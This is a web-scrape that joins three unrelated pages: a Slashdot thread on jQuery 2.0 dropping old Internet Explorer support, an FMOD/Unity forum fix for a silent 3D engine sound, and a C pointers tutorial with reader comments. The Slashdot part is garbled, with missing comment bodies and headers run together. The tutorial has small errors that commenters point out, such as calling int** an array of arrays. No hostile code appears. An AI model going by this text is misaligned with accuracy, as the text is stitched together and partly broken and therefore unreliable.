Mobile devices are demanding HTML 5 and CSS 3 with JIT javascript engines. This legacy shit is a pain in the ass and moves the external costs to the developers. Maybe if internet growth was still desktop oriented but its not. It is a pain to write 2 different websites. Worse, Windows 7 comes with IE 8 so these users who do leave XP by 2014 will probably lock their corporate desktops to it until 2020 while we STILL WAIT for iphone 2007 functionality. That is ridiculous.
Re:Too soon (1)
shutdown -p now (807394) | more than 2 years ago | (#40643401)
I think it would be better if they continued to support IE in their main branch, but also offer a "lite" version without IE support.
They did just that. The "lite" version is called 1.9, the full one is called 2.0.
Should Firefox below 10.0 as well. (0)
Anonymous Coward | more than 2 years ago | (#40642315)
Since 10.0 is the ESR that is the lowest supported baseline now even though it is only supposed to be used in corporations. Too many people still using the unsupported 3.6 release and below. Getting major web toolkits to drop it will provide a force to push people up to date. Then when ESR 17 and 24 come out do the same.
Unfortunately IE 8 will be here for a while. Purely because Microsoft won't give anything above it for XP. XP is here to stay for a long time despite being "officially" dropped in 2014. Yes you can install other browsers on XP but not in corporate controlled environments.
Re:Should Firefox below 10.0 as well. (1)
furbearntrout (1036146) | more than 2 years ago | (#40643351)
Missing the point (4, Informative)
bobetov (448774) | more than 2 years ago | (#40642417)? (5, Insightful)
Anonymous Coward | more than 2 years ago | (#40642421)
Fine, finally kill the bastards. But 8?! This is the last IE available for XP, which is still widely used in companies....
Good thing (2)
mpol (719243) | more than 2 years ago | (#40642429):Good thing (1)
man_of_mr_e (217855) | more than 2 years ago | (#40642595)
More than likely, it's the same code for IE6/7/8 that they're dropping. If you leave it for 8, you may as well leave 6 and 7, because you don't gain much.
Re:Good thing (2)
Billly Gates (198444) | more than 2 years ago | (#40642877):Good thing (0)
Anonymous Coward | more than 2 years ago | (#40643411)
I have to support a lot for a gov site. I don't know what your corporate policy may be, but clients start getting
/really/ flustered when I show them the pricing structure for IE support...
I'm willing to go back to IE5, but nobody's ever taken me up on what that would cost. IE7 is an extra 20% on
/all/ development costs (plus features being removed or replaced with crippleware) and IE6 is 50% beyond that.
Some of those numbers are to keep up with training on new technologies while having to support relics.
Now, there's a lot of infrastructure and systems in place to try to make this work -- but it's all stuff that takes real time for me to learn, write up, troubleshoot. It slows down debugging, makes the libraries slower, and basically results in horribly 'forked' applications. Or flash.
I realize a boss is a boss is a boss and can say anything they want. But have you tried giving yours an itemized timesheet where they see that "IE6 support constitutes 35% of the total cost of the project" ? Or that "making this little circle draw right here in IE7 actually slows the application by 5000%, and while you can fix it, the resulting fork has tripled your code base and made your 5 minute test suite take an hour?
At a certain point, your
/boss/ will start billing IT for refusing to install firefox or chrome, even if it's just for your web app.
At an old job our web app actually got people off of IE5 when the CEO of a fortune 500 dragged their CIO into their office and told them to find a way to upgrade, get firefox installed for an entire department, or resign. Now, that company didn't bill extra for old support (they should have). We just didn't have the resources to get our application working in IE5 (or I wasn't good enough, same thing).
The thing is, your time is probably cheaper than those desktop upgrades. Because as an employee, they think of you as a black-box that gets-the-job-done-per-month. You need to present IE6 (and 7, and 8, and probably 9 for the lack of webgl) as an unecessary operational expense. Just like some apocryphal mainframes in a modern bank where 100 meg hard drives cost thousands to replace, but they still need that old COBOL reporting system from the 60's... IE6 is a liability and a threat to your mission success.
Re:Good thing (1)
Billly Gates (198444) | more than 2 years ago | (#40642985)
Issue I have with conditional comments is the bloated javascript libraries are still loaded and now they are bloated by 2x, even if they are ignored by the browser. IE 6 crashes with too much javascript.
For example in IE 6 I can load msnbc.com fine and it still is compatible. But it will freeze up randomly when these annoying social media scripts start up. I have to alt tab and kill it and use a custom hosts file for it to even load half the time.
The costs add up with ISPs now putting in caps and raising bandwidth rates as their competitors die off. 2 megs a view is very expensive and not friendly to those still on dial up vs half that without jquery
... especially 2 jqueries loading up.
So in essence I am in favor of 2.0 but will not use it for awhile for these reasons. If old IE finally dies out by 2014 then I will upgrade. I have a feeling the corporations are terrified of new browsers after IE 6 hell and will stay with 8 until 2020 until developers stop supporting IE 8. It is already becoming the new IE 6 of this decade and MS now has IE on an annual release trek so IE 18 will be out by then.
Dojo Toolkit (1)
MatrixCubed (583402) | more than 2 years ago | (#40642489)
Another reason why Dojo Toolkit [dojotoolkit.org] is more attractive than jQuery. Clients don't care that the JS executes however many milliseconds faster, and they also don't care that the developers have an easier time not supporting older browsers.
What they do care about is stuff that "just works", and being able to add new features at the speed of *click*. Like any tool, if it hinders you from delivering either of these, it's fit for the trip out behind the woodshed.
I'd like to hear comments from other toolkit devs (Sencha, YUI, etc).
Re:Dojo Toolkit (-1)
Anonymous Coward | more than 2 years ago | (#40642613)
I see all toolkits as crutches for people who can't be bothered to learn Javascript. The resulting code from using one of those toolkits also makes it impossible for someone who knows Javascript to debug the toolkit shit-looking code.
Re:Dojo Toolkit (1)
Anonymous Coward | more than 2 years ago | (#40642699)
Re:Dojo Toolkit (2)
cyber-vandal (148830) | more than 2 years ago | (#40643085):Dojo Toolkit (2)
steveb3210 (962811) | more than 2 years ago | (#40643161)
Because looking at code littered with var e = document.getElementById('stuff'); is just so much more elegant and non-shit-looking than $('#stuff')..
This won't really affect anything. (2, Insightful)
Kate6 (895650) | more than 2 years ago | (#40642509)
All you need is some back-end code to examine the user's browser's "useragent" string and figure out which version of jQuery to serve.
<?php
preg_match( '/MSIE ([0-9\.]+)/', $_SERVER[ 'HTTP_USER_AGENT' ], $matches );
if ( ( count( $matches ) == 2 ) && ( floatval( $matches[ 1 ] ) < 9.0 ) )
echo "<script type='text/javascript' src='jQuery-1.9.min.js'></script>";
else
echo "<script type='text/javascript' src='jQuery-2.0.min.js'></script>";
?>
Re:This won't really affect anything. (1)
flux (5274) | more than 2 years ago | (#40642605):This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40642687)
2.0 will implement the same features as 1.9 but in more optimized ways, by relying on browser features not available in legacy versions of IE. The whole point of having a standardized API is that you can provide different implementations of that API.
Re:This won't really affect anything. (0)
Anonymous Coward | more than 2 years ago | (#40642959)).
Presented to you in glorious PSEUDOCODE!!!
2.0:
function doSomeStandardThing()
{
someStandardAction();
}
Compare to, in 1.9:
function doSomeStandardThing()
{
if(IE6)
{
doSomeNonstandardIEBullshit();
}
else if(IE7)
{
doSomeDifferentNonstandardIEBullshit();
}
else if(IE8)
{
goodLordDoWeSeriouslyHaveToDoMoreNonstandardBullshitForIE();
}
else
{
someStandardAction();
}
}
Now, multiply that by every point at which IE pulls something from way the hell out in left field to do something everyone else agreed on doing a single, different way, and you'll quickly see that 2.0 will run faster without having to make all these extra checks, and will be smaller without having to carry all the extra weight of special magical IE nonsense around.
Re:This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40643033)
Re:This won't really affect anything. (2)
dingen (958134) | more than 2 years ago | (#40643021):This won't really affect anything. (1)
cyber-vandal (148830) | more than 2 years ago | (#40643119)
Speed.
Re:This won't really affect anything. (1)
furbearntrout (1036146) | more than 2 years ago | (#40643325)
Re:This won't really affect anything. (1)
steveb3210 (962811) | more than 2 years ago | (#40643179)
Re:This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40643283)
By all means, though, go ahead and start a whole sub-thread about what the most optimal way to do the browser detection would be. There seems to be a lot of commenters who feel it ought to be done using IE conditional comments.
Re:This won't really affect anything. (0)
Anonymous Coward | more than 2 years ago | (#40643291)
Nobody cares.
Conditional Comments are your friend... (0)
Anonymous Coward | more than 2 years ago | (#40642647)
Remember that IE can be used in Conditional comments
that is
<!--[if lt IE 9]>
jquery 1.9
<![endif]-->
So use both, that's why there's API parity.
Dropping IE8 support at this time is unacceptable (2)
JDG1980 (2438906) | more than 2 years ago | (#40642803).
Re:Dropping IE8 support at this time is unacceptab (0)
93 Escort Wagon (326346) | more than 2 years ago | (#40642957)
Workplaces should actually be the least problematic. You can dictate what version of IE people are using, and at this point any responsible IT department REALLY should have a migration plan in place for getting rid of any legacy XP boxes.
Heck, if a workplace hasn't already moved to 7 by now - they've got bigger issues than worrying about jQuery.
You didn't even read the whole summary (0)
Anonymous Coward | more than 2 years ago | (#40643027)
Their 1.9 branch will continue to support IE8 at least as long as Microsoft does.
Re:Dropping IE8 support at this time is unacceptab (0)
Anonymous Coward | more than 2 years ago | (#40643045)
JQuery 2.0 won't see really widespread use on the 'desktop' web until the userbase has largely moved away from XP. In the mobile world, though, we are grateful for any speed boost, so it'll build up a head of steam there for awhile.
This isn't anti-MS flamewar crap. JQuery is fully embraced by Microsoft, and is basically their ordained way of doing things in ASP.net MVC.
If JQ2.0 has major features that developers really want/need, I would expect that MSFT would maintain their own fork for older versions of IE.
Hell, if it's call compatible with 1.9, a few simple lines of javascript should be sufficient to load the right library for the browser. Browser detection in javascript is an ugly hack, but it'd be a workaround, at least.
Or you could use chormeframe, but that's an even uglier hack, IMO.
Version numbers causing confusion (1)
dnwheeler (443747) | more than 2 years ago | (#40642897)
I think the primary cause of the confusion is that there are two version numbers. It sounds like the "new" version is dropping IE6-8 support when, in fact, both 1.9 and 2.0 are "new" versions. It would have been better if they shared a version number with some sort of modifier:
2.0 - 2.0 without legacy support
2.0L - 2.0 with legacy support (IE6-8)
Simply changing the version number makes the difference clear while mitigating the worry/panic.
I don't use jQuery, here's why (-1)
Anonymous Coward | more than 2 years ago | (#40642915)
I don't use jQuery,
Now I have nothing but love for people want to build things that make it "Easier" and "Faster" for everyone, but listen to me for a sec:
Drivers
|
Windows-Linux-MacOS
|
Abstraction Layers over the OS, Firefox, Chrome
|
Javascript API's (DOM, SVG, WebGL, Web Audio, etc)
|
Javascript Libraries
There's already three levels of
... cruft... if you will. This is the type of code bloat that plagues Perl (everytime you update Perl, you have to go recompile every framework, like DBI/DBD, when you have hundreds of these things, you may as well just cut them all out and roll your own)
In my opinion there is no point to using jQuery, it doesn't add anything that you can't do without it. 50% of the time when I try to look up how to do something in javascript, I get some "simple javascript" that's actually jquery code. Stop it. If you want to use jQuery, please understand the underlying code, and don't simply assume that what you write is efficient. jQuery is a huge source of code bloat, where someone wants something that can be written in two lines of javascript, but they instead include a 250KB javascript library to do it.
If the code you write will be faster and more compact, using jquery, by all means go ahead. But if you're trying to do something that is already stupidly simple to do, then please stop and think about it. For example, writing a TTS engine or NES emulator, using jQuery, is just a bad idea. There is no opportunity to write assembler in interpreted languages. Maybe that needs to change. Maybe more lower-level API's do need to be exposed through Javascript (OpenCL/DSP, OpenGL shaders, etc) maybe Javascript needs an opcode cache like PHP, where frequently used script hashes (eg jQuery) can remain in a compiled state in the browser, thus making it beneficial to use jQuery over rolling your own code all the time.
Re:I don't use jQuery, here's why (1)
steveb3210 (962811) | more than 2 years ago | (#40643223)
..
Dewey (2)
michaelmalak (91262) | more than 2 years ago | (#40642925)
Legacy Branching? (2)
kiehlster (844523) | more than 2 years ago | (#40643007)
jQuery freezes at 1.9 (0)
Anonymous Coward | more than 2 years ago | (#40643017)
And so having completed a library that addresses the weaknesses and incompatibilities it seeks to address, jQuery will reach its ultimate version at 1.9. jQuery 2.0 won't be very popular for years.
Remember, IE 7 is old, but people are buying computers less frequently, so I don't think it's going away so quickly. It is going to be REALLY hard to kill Windows XP. And so it will be really hard to get everyone onto IE9.
Anyway, I think the future browsers will just be made with jQuery in mind. They'll probably all run a version of the jQuery selector natively. I think future browsers will integrate jQuery away.
Re:jQuery freezes at 1.9 (1)
dingen (958134) | more than 2 years ago | (#40643103)
Windows XP doesn't have to die for IE8 to go away. Every other browsers' latest version runs great on XP.
jQuery native support (2)
JDG1980 (2438906) | more than 2 years ago | (#40643029).
THANK GOD! MAYBE THIS IS THE BEGINNING OF THE END! (0)
Anonymous Coward | more than 2 years ago | (#40643039)
I'm having a "Gangs of New York" moment here yall.
"The Earth turns, but we don't feel it move. And one night you look up. One spark, and the sky's on fire."
-Amsterdam Vallon
hmm (1)
buddyglass (925859) | more than 2 years ago | (#40643281)
Someone please help me!
I have a strange issue with the getParameters function in FMOD (Last Version (today october 1st 2014)) and unity 4!
Using the example CAR ENGINE for get parameters in online PDF, I did the same as the script was there.
IF I use a bank with no parameters, just PlayOneShot, it works fine. BUT Parameters dont make any sound. Here’s my code example:
using UnityEngine;
using System.Collections;
using FMOD.Studio;

public class SomCarro : MonoBehaviour
{
    FMOD.Studio.EventInstance engine;
    private FMOD.Studio.ParameterInstance engineRPM;
    public float contador;

    // Use this for initialization
    void Start ()
    {
        contador = 0; // the counter to increment a value, just for test
        engine = FMOD_StudioSystem.instance.GetEvent ("event:/Vehicles/Car Engine");
        engine.getParameter ("RPM", out engineRPM);
        engine.start ();
    }

    // Update is called once per frame
    void Update ()
    {
        contador = contador + 100;
        engineRPM.setValue (contador);
        if (contador > 6000)
        {
            contador = 0;
        }
    }

    void OnDisable ()
    {
        engine.stop (FMOD.Studio.STOP_MODE.IMMEDIATE);
        engine.release ();
    }
}
- João Francisco Ligeiro asked 4 years ago
- last edited 4 years ago
- You must login to post comments
The code looks fine, the only thing you’re missing is setting the position of the event. The engine is a 3D event so you need to make sure that your listener is near the event. When you call getEvent without setting the 3D attributes it will default to the origin [position = (0,0,0)]. It will be silent if it is too far away from the FMOD Listener.
Add this line to Update to set the 3D position of the FMOD Event:
engine.set3DAttributes(FMOD.Studio.UnityUtil.to3DAttributes(gameObject));
- Guest answered 4 years ago
- last edited 4 years ago
First of all, I did a mistake putting that sentence you mentioned in the Start function…. “OMG it didn’t work! The sound stays in the place!” After my distraction, I’ve input this line in update! MANY MANY MANY Thanks! It really works and I spent my last 2 weeks trying to solve this, and i didn’t found anything! THANKS! IT WORKS VERY WELL!
- João Francisco Ligeiro answered 4 years ago
Intro to C Pointers and Dynamic Memory

Memory is the oxygen of a C program. Doing anything constructive in C involves using memory. As we saw last time, memory for stack variables is cleaned up automatically. More advanced C programming requires using dynamic memory allocation, which you have to manage yourself.
Dynamic memory allocation allows you to get blocks of memory of any size (within reason), and control them using pointers. Pointers have a reputation for being hard to deal with, but the basic mechanisms are simple. The only mental adjustment is the idea of dealing with something that refers to something else.
Warning! This is intended as a quick, rough introduction to a deep topic. The goal is to just take the edge off of C a bit, not explain every aspect of memory management. Before you go out and write sensitive code (particularly security or server software), you must take the time to understand the deeper ramifications of memory management. You've been warned.
Pointer Syntax
It's obvious a pointer points to something, but what? A pointer refers to a location in memory. In other words, it refers to a piece of data. Here's a basic pointer example:
#include <stdio.h>
int main ()
{
// declare an int variable and an int pointer variable
int number;
int* pointer;
// set a value for 'number'
number = 5;
// now link 'pointer' to 'number' by putting the 'addressof'
// operator (&) in front of the number variable
pointer = &number;
// print values of number and pointer
// note the %p marker is used for pointer and &number
printf( "value of number: %i\n", number );
printf( "value of &number: %p\n", &number );
printf( "value of pointer: %p\n", pointer );
// print value of pointer's target (number) using
// the asterisk (*) operator
printf( "value of pointer's _target_: %i\n", *pointer );
}
This gives you output similar to this:
value of number: 5
value of &number: 0xbffffc5c
value of pointer: 0xbffffc5c
value of pointer's _target_: 5
Notice how the pointer simply stores the address (location) of the original variable. That's why the second and third lines of output have the same value. It may seem like this code doesn't have much practical use, but we're just trying to get the basic syntax straight first.
The key thing here is that just like a normal variable, the pointer variable has a value. With a normal variable, the literal value (such as "5") is the interesting data. With a pointer, the interesting data is what's at the memory address that it refers to (0xbffffc5c in this case). You can get the value of the target variable using the asterisk:
printf( "value of pointer's target: %i\n", *pointer );
This is called dereferencing. The star does all the necessary low-level calculations to fetch the data so you don't have to do the math yourself.
Hexadecimal Notation

The value of pointer is displayed in hexadecimal format (just like web colors). Don't be intimidated by the alien notation, it's still just a number. Hexadecimal numbers are expressed in base 16, meaning each digit has 16 different values. Decimal numbers (the ones we're used to) are expressed in base 10:

Decimal has 10 possible values for each digit:

0, 1, 2, 3, 4, 5, 6, 7, 8, 9

Hexadecimal has 16 possible values for each digit:

0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f

The 0x part is just a prefix to tell C that it's a hexadecimal number. The actual numeric value is bffffc5c. So now you can sleep tonight knowing what is meant by the term "base 16".
Pointers Making You See Stars?
Pointer syntax tends to confuse novice C programmers. The problem is that the asterisk (aka "star") is used for two distinct purposes: in a pointer declaration and when fetching the value of the target (dereferencing).
Here's an example of each:
// declare a basic int variable
int number = 18;
// use the asterisk to _declare_ a pointer
int * numberPointer;
// assign a value to the pointer
numberPointer = &number;
// use the asterisk again, this time to _fetch_
// the value of the _target_ variable (number)
printf ("Value of target: %i", *numberPointer);
In an ideal world, a pointer declaration wouldn't contain an asterisk, but this is the syntax that we have in our universe.
Copy Versus Reference
Keep in mind the difference between a pointer which refers to a variable and a copy of a variable. Here's an example:
#include <stdio.h>
int main ()
{
float myNumber;
float myNumberCopy;
float * myNumberPointer;
// first, set an initial value
myNumber = 1.618;
// copy the value
myNumberCopy = myNumber;
// make a pointer to the value using the
// ampersand, known as the "addressof" operator
myNumberPointer = &myNumber;
// change the original
myNumber = 2.0;
// now check the values.
// be sure to use the star (*) to fetch the value
// of myNumberPointer's target
printf( "myNumber: %f\n", myNumber );
printf( "myNumberCopy: %f\n", myNumberCopy );
printf( "myNumberPointer: %f\n", *myNumberPointer );
}
Here's the output:
myNumber: 2.000000
myNumberCopy: 1.618000
myNumberPointer: 2.000000
The copy gets its own value, but the pointer stays linked to the original.
Malloc and Free Functions
The memory for basic variables such as ints, floats and simple arrays is handled automatically. Sometimes, though, you need to exercise more control. Dynamic memory management means that you can reserve a large block of memory, but you have to take responsibility for freeing it later.
The malloc family of functions is used to deal with these blocks of memory. The most basic of these is malloc(), which takes a size as input and returns a pointer to a new block of memory. The term "malloc" is short for "memory allocate". Here's a simple example:
// reserve 4 bytes of memory
void * memoryBlock = malloc ( 4 );
The "void *" type means that the memoryBlock will store a pointer to a block of memory with an undefined type. That is, we're not specifying what kind of data will go in there. When you're done with the block of memory, you have to release it using the free() function:
free ( memoryBlock );
If you don't do this, you'll have a memory leak on your hands (yuck!).
Making a Memory Block Useful
Allocating 4 byte memory block isn't all that interesting. What we really want to do is get a memory block that can hold a certain number of values. For example, if we want to hold 20 int values, we can do this:
void * memoryBlock = malloc ( sizeof(int) * 20 );
We use the sizeof operator to calculate the size of a particular type of variable. That number is then multiplied by the number of values we want to store (20).
We can also use a variation of the malloc function, called calloc. The calloc function takes two arguments, a value count and the base value size. It also clears the memory before returning a pointer, which is useful in avoiding unpredictable behavior and crashes in certain cases:
void * memoryBlock = calloc ( 20, sizeof(int) );
A memory block like this can effectively be used as a more flexible array. This approach is actually much more common in real-world C programs. It's also more predictable and flexible than a "variable size array" (mentioned in the previous tutorial).
But how do we get and set values in each slot? One common approach is to use the ++ and -- operators to move the pointer forward or back in the memory block. In order to do this, we should set the correct type for the returned memory block:
// create a "moveable" int pointer
int * memoryBlock = calloc ( 10, sizeof(int) );
This allows the ++ operator to move forward the exact size of an int variable each time, effectively moving forward one "slot" in our array-like memory block.
#include <stdio.h>
#include <stdlib.h> // for calloc and free
#include <time.h> // for random seeding
int main ()
{
const int count = 10;
int * memoryBlock = calloc ( count, sizeof(int) );
if ( memoryBlock == NULL )
{
// we can't assume the memoryBlock pointer is valid.
// if it's NULL, something's wrong and we just exit
return 1;
}
// currentSlot will hold the current "slot" in the
// array, allowing us to move forward without losing
// track of the beginning. Yes, C arrays are primitive
//
// Note we don't have to do '&memoryBlock' because
// we don't want a pointer to a pointer. All we
// want is a _copy_ of the same memory address
int * currentSlot = memoryBlock;
// seed random number so we can generate values
srand(time(NULL));
int i;
for ( i = 0; i < count; i++ )
{
// use the star to set the value at the slot,
// then advance the pointer to the next slot
*currentSlot = rand();
currentSlot++;
}
// reset the pointer back to the beginning of the
// memory block (slot 0)
currentSlot = memoryBlock;
for ( i = 0; i < count; i++ )
{
// use the star to get the value at this slot,
// then advance the pointer
printf("Value at slot %i: %i\n", i, *currentSlot);
currentSlot++;
}
// we're all done with this memory block so we
// can free it
free( memoryBlock );
}
This isn't the only correct way to do this sort of thing, just one approach. Also, keep in mind that since a memory block can be treated as an array, you're likely to see things like this in code:
char * myString;
Since a string is an array of individual characters, a memory block filled with individual characters can act as a string as well.
Arrays of Arrays
Multi-dimensional arrays are not unique to C, but deserve mention here. They basically come in two flavors. The more basic form:
int grid [10][10];
...and the more flexible form you're likely to see in the wild:
int ** numberGrid;
This may look a bit strange, but remember two points:
1. A memory block is represented as a pointer (void * memoryBlock)
2. A memory block can act as an array
So if this is an array:
int * numberArray;
... this can be an array of arrays:
int ** numberGrid;
Be careful, though, because this sort of declaration could also be treated as an array of pointers to specific ints, which is a subtle difference.
Array of Strings
Dealing with strings in C is really deserving of its own post so I'm not going to go into deep details here, but there's one convention that you should be aware of for general code reading:
char ** inputValues;
This sort of thing is usually an array of strings. Remember, a string is an array of individual characters, so an array of strings is a two-dimensional array of characters.
Final Example
Here's a short program that illustrates all of these points.
#include <stdio.h>
#include <stdlib.h>
int main ()
{
// number of strings
const int count = 5;
// declare an array of strings
char ** stringArray = calloc ( count, sizeof(char *) );
printf("stringArray address: %p\n", stringArray);
// if the memory we asked for isn't available, return
if ( stringArray == NULL )
{
return 1;
}
// this is what we'll use to move through the
// memory block
char ** currentString = stringArray;
int i;
printf("Initial currentString address: %p\n", currentString);
// now we have to loop through the memory block and
// allocate memory for a string at each "array" slot.
//
// note that the asprintf() function doesn't return
// the string. Instead, it allocates a new string and
// stores its address directly in the slot
for ( i = 0; i < count; i++ )
{
asprintf ( currentString, "String %i", i );
currentString++;
printf("currentString address: %p\n", currentString);
}
// reset memory block to the original address.
// In other words, go the beginning of the "array"
currentString = stringArray;
printf("currentString address after reset: %p\n", currentString);
// display the string at this particular slot.
// we have to use the star to de-reference
for ( i = 0; i < count; i++ )
{
printf( "%s\n", *currentString );
currentString++;
}
// reset
currentString = stringArray;
// loop through and free the memory for the
// string at each slot
for ( i = 0; i < count; i++ )
{
free ( *currentString );
currentString++;
}
// now free the memory block itself
free ( stringArray );
}
This should give some output like this:
stringArray address: 0x500120
Initial currentString address: 0x500120
currentString address: 0x500124
currentString address: 0x500128
currentString address: 0x50012c
currentString address: 0x500130
currentString address: 0x500134
currentString address after reset: 0x500120
String 0
String 1
String 2
String 3
String 4
Notice how each time we do currentString++, the address increases by four bytes:
500120 > 500120 > 500124...
This allows us to move through the memory block and treat it as an array. After the loop is complete, we have to "reset" currentString by reassigning its value to that of stringArray:
currentString = stringArray;
If we don't do this and attempt to keep moving through the array, we'll run off the end of the memory block and bad things will happen. This is how bugs are born! There are various tools to avoid these sorts of situations, but those are beyond the scope of this post.
Wrap Up
You should now have at least a basic grasp on how pointers and dynamic memory management work in C. Now go out and experiment on your own. Go on, get.
Intro to C Pointers and Dynamic Memory
Posted Feb 24, 2006 — 38 comments below
Posted Feb 24, 2006 — 38 comments below
Jesper — Feb 25, 06 840
"For example, if we want to hold 20 ***float*** values, we can do this:
void * memoryBlock = malloc ( sizeof(***int***) * 20 );"
Scott Stevenson — Feb 25, 06 842
Ben — Feb 25, 06 846
One question, how often do you find yourself coming back to these first princples when developing for Apple? Especially when there so much more framework and use of Collections is possible? I'm very interested to know, or is this information more about having a solid foundation?
Scott Stevenson — Feb 25, 06 848
I'm glad you find it useful, but it's probably unfair to call this Obj-C. Really more just plain C. :)
One question, how often do you find yourself coming back to these first princples when developing for Apple?
The Foundation classes can replace raw C memory management in many or most cases, but higher-end Cocoa apps often need the speed that you get from working at a lower level. You also may need to know this stuff if you want to use a C library in your app.
Scott Stevenson — Feb 27, 06 851
but higher-end Cocoa apps often need the speed that you get from working at a lower level
What I mean by this is that higher-end apps often need optimization in certain, specific areas of the code, typically found using a profiling tool like Shark. In those places you might be better off using raw C data structures. In most cases, though, you can use Foundation or Core Foundation.
I don't want to leave anyone with the wrong impression. The Foundation storage classes are made up of highly-optimized, industrial-strength code. They fit the bill in the vast majority of cases.
Erik — Feb 27, 06 852
Peter — Apr 10, 06 1096
"int **p" does not declare an array of arrays, nor a two-dimensional array of integers. It declares a pointer to a pointer (to an int). The biggest difference occurs when you pass "p" as a parameter to something, or try to make an "extern" declaration that references it.
Scott: I'd be glad to discuss this at length with you if you want to email me. A good foundation in pointers can set a programmer up for life; a shaky foundation can ruin him for years.
Scott Stevenson — Apr 10, 06 1097
I guess I don't quite agree. Many tutorials will explain pointers in terms of the internal mechanics, but my feeling is that teaching through actual, day-to-day use works better in many cases.
I also don't think the tutorial creates quite as dire a situation as you suggest. This is just meant as a starting point for practical basics. Trying to explain all the details would miss the point.
Also note that I say that notation can be an array of arrays, which I think is true enough for what I set out to do here.
James — Apr 28, 06 1145
I don't know Objective-C at the moment, so I don't know how important it is to get into grittier details earlier, but there you go.
JetLoong — May 09, 06 1196
Now I can do further readings on C books ^^ Thx to u
DRAY — May 11, 06 1216
One question though... ( ...always a catch eh?)
Why is it that I get the following when freeing the "inner array mem" with
// reset
currentString = stringArray;
for...
{
free( *currentString );
currentString++;
}
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f80; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f88; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f8c; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f90; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f94; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
thanks again for the great work!
David
DAniel — Jun 28, 06 1426
I'm trying to deal with a little subject , may be you could help me.
Supose I declare a pointer to char and allocate some memory for it, and then, in the middle of the program turns out to be insuficient. how could I enlarge the amount of space allocated for it. for example, when reading unknown length input from the keybord.
Other thing I'm having some problem with is when trying to get the size of an array of pointers to char (char *ptrarr[]) . How could I know how many pointers to char are there ? sizeof(ptrarr) doesn't work.
Henrik N — Oct 20, 06 2113
Galen — Jan 02, 07 2978
This is a really great article. I like your approach. One problem I sill have with pointers is this: Why and when should you use pointers? The copy example was a good one but I have the feeling that that just scratches the surface. Especially when looking at C, C++ or Objective-C code. Pointers seem to be everywhere with absolutely no rhyme or reason. A post on why and when to use pointers would be excellent.
Thanks!!
Scott Stevenson — Jan 02, 07 2980
There are many things you simply cannot do without them. In a sense, pointers are a way for different parts of a program to access the same data. In some cases, they're the only way. In fact, the only thing you can really do without pointers is pass around individual number values or single characters. As soon as you want to use arrays, strings (blocks of text), or Cocoa objects you need pointers.
I think a lot of the confusion from pointers stems from the name. It make it sounds like a pointer is active, that it does something. It really does not. It's just a number that uniquely indentifies a piece of data in memory. It might be easier to actually think of them as unique IDs.
In Cocoa, all object variables are pointers because all of them are stored in the same central location -- in "heap" memory. That is, if you create an object inside a function, it doesn't automatically "go away" at the end of the function. The only way to "reach" the object in heap memory is to refer to it by its unique ID -- the pointer value.
I hope that helps.
Herb Payerl — Jan 22, 07 3380
I think one thing that might deserve further explanation is that the function asprintf actually allocates memory for the strings it creates. The calloc function just reserves space for an array of pointers.
Thanks
Michael Dreher — May 06, 07 4044
I just read this interesting tutorial, coming from cocoadev's intro to C. I already knew basically all the concepts, but I have never seen a better introduction to pointers than yours. Thumbs up!
One mistake I recognized in your tutorial is the following:
Notice how each time we do currentString++, the address increases by four bytes:
500120 > 500120 > 500124...
which does not really increase by four bytes each time.
I really like your way of presenting, like pointers here, or the great introduction to classes and objects in the cocoadev tutorials. And I hope you are using this talent as a professional instructor or teacher. If not, you should strongly consider it.
Michael
Chris Benedict — Sep 26, 07 4654
I really hope to see more tutorials like this that get progressively more in depth, I have really enjoyed going from your "Learn C" tutorial on Cocoa Dev Center to "C Memory and Arrays" now to "C Pointers and Dynamic Memory".
My only question is where can I go now to learn the nitty gritty details and mechanics?
Sean McGinty — Oct 27, 07 4868
Thanks for this post and the others on C. I've recently started exploring Cocoa and it's been quite a while since I've looked at C code. I looked around the web for a refresher but couldn't find one that met my needs until now. Thanks again!
Alison — Mar 29, 08 5689
Many thanks.
Scott Stevenson — Mar 30, 08 5692
Hi, Alison. I'm glad it helped.
Rebecca — Apr 01, 08 5699
I was a little puzzled by what you meant in the final example:
//we have to use the star to de-reference
So I added another printf for my own reference:
printf("currentString is %p\n", currentString);
to compare the difference between currentString and *currentString at this point.
Then I realized currentString is just the address (or the ID, using your words), and *currentString is the actual value contained in the reserved space.
Just thought I should point out the obvious for other dummies like myself.
Dharm — Jun 11, 08 6061
So, apart from using subarrayWithRange 1-[array count], is there a more efficient way to do this like in C style?
Thanks.
Dharm — Jun 11, 08 6062
Scott Stevenson — Jun 12, 08 6065
You can't manually increment the pointer, which is by design. Cocoa supports both NSArray objects and the regular C-style arrays (but Cocoa methods rarely create C-style arrays). NSArrays are much safer to use, partially because they don't let you do things like that.
If you want to create a C-style buffer from an NSArray, you can use NSArray's -getObjects: method. That said, I'd strongly encourage you to reconsider your design before doing that because it's generally bad practice for Cocoa and is not required in most cases. NSArray is incredibly fast, so you really shouldn't need to work about performance in most cases.
Jamie Lemon — Mar 26, 09 6673
Eapen — Jul 11, 09 6828
It is really appreciated.
Eapen — Jul 11, 09 6829
Steffen Frost — Sep 28, 09 6905
In your first example you declare a pointer with...
// declare an int variable and an int pointer variable
int number;
int* pointer; <-- no space between 'int' and '*'
In the second example...
// use the asterisk to _declare_ a pointer
int * numberPointer; <-- space between 'int' and '*'
I compiled and ran both with and without the space between 'int' and '*', and it doesn't make a difference. Little things like this can through you off if you are trying to learn syntax.
Just a nit.
Steffen Frost — Sep 28, 09 6906
